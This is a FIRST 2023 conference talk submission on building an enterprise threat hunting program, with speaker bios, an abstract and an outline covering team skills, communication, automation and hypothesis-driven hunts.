FIRST 2023: The 35th annual FIRST conference Fairmont Queen Elizabeth Hotel Montréal, Canada, June 4-9, 2023 |
Conference website | https://www.first.org/conference/2023/conference-overview |
Abstract registration deadline | December 3, 2022 |
Submission deadline | May 9, 2023 |
Building an Effective Threat Hunt Program
Bios
Mark has been working in the Cybersecurity industry for 10 years. With positions starting from an analyst with the US Air Force CIRT to helping build a hunt program from the ground up at a major financial institution. He’s seen various methods used to organize enterprise scale SOC’s and the challenges that go with them. He currently holds several security Certs including CISSP, GCIH, and GCFA
Sandeep has over 16 years of experience in Cybersecurity, primarily in the technology sector. He has been working as a Senior Cyber Threat Hunter with Adobe, providing SME-level guidance to the SOC and, most recently, the Hunt team. His expertise includes threat hunting, detection engineering, and security monitoring. He holds several industry-leading certifications, such as AWS-ASA, GCFA, GCED, and EnCE, etc., and has been part of the SANS Advisory Board since 2016.
Keywords
Incident Response; Threat Hunting; DFIR; Automation; Team Building; Metrics and Reporting; Threat Hunting Tooling
Abstract (100-150 words)
Over the last few years, an influx of industry high profile security issues have placed offensive security tactics among the top priorities for corporations to help mitigate the risk of a potential attack.
With many companies opting to continue remote and hybrid working environments for their employees, potential security risks cannot go ignored or left to chance. An emphasis on developing greater defensive security tactics, working in tandem with offensive security teams, is essential for identifying behaviors of potential threats and building stronger barriers against evolving challengers.
Threat hunting has emerged as a must-have security component for companies as it encompasses the tasks of identifying patterns of threat behaviors and hunting for anomalies and changes occurring in an environment based on suspicious activity. This is all with the goal building up defenses to combat threats before damage can be done.
What makes a successful threat hunting program? The reality is that identifying suspicious activity may not be as straightforward as it may seem. It requires a comprehensive approach with proactive manual detection, constant communication between teams, and an investment in the right people to bring the process to life.
Outline (300-500 words)
Hunt Focuses
-
Hunt vision: To reduce dwell time of attacker in network to identification of incident.
-
We concentrate on the top 3 tiers of the pyramid of pain (Host/Network Artifacts, Tools, TTPs)
Who makes up a good hunt team?
-
Hunting requires a human touch
-
The act of threat hunting cannot be fully automated. Since each data set is different and attacker techniques are ever changing there is a need for the human component to consistently evolve with it.
-
Threat hunting is not an entry level position
-
Threat hunting should be a higher level position that triage analysts and detection engineers work toward as a next step.
-
Skill sets required
-
Log analysis
-
Endpoint and Cloud forensics
-
Detection Engineering
-
Firm understanding of attack techniques and behaviors
Communication for success
-
A successful team must have an efficient way to have outside members interact.
-
Input of new ideas
-
New Ideas can come from anywhere. The more interesting ones come from the subject matter experts and analysts (e.g. Database Engineers, Web Admins, Domain Admins, triage folks, etc.).
-
Dissemination of hunt findings
-
Output of hunt finding for other teams
Automation is also needed
-
Process automation: How do we eliminate the overhead and empty time spent on closure of a hunt?
-
Automate backlog curation
-
Automate Hunt Reporting and closure
-
Automate outputs for other teams
-
Automation of log analysis: UEBA (User and Entity Behavior Analytics)
-
You cannot catch all the fish in the ocean at once. With some help you can cast a very wide net to assist in processing mass amounts of data.
Stopping adversaries in their tracks
-
Rally behind a hypothesis
-
A hypothesis is the driver for a hunt. It revolves around a singular focus on how the adversary is operating in your network.
-
Create a clear goal for the program (e.g. reducing time adversaries spend in the network, reduce the number of high impact threats, etc.).
-
Identify the right automated tools.
-
Analyze data for anomalies and work cross-team to build new, improved defenses .
-
Not all threat hunting campaigns will be equally successful.
-
Create methods that no hunt goes without some benefit to your security posture.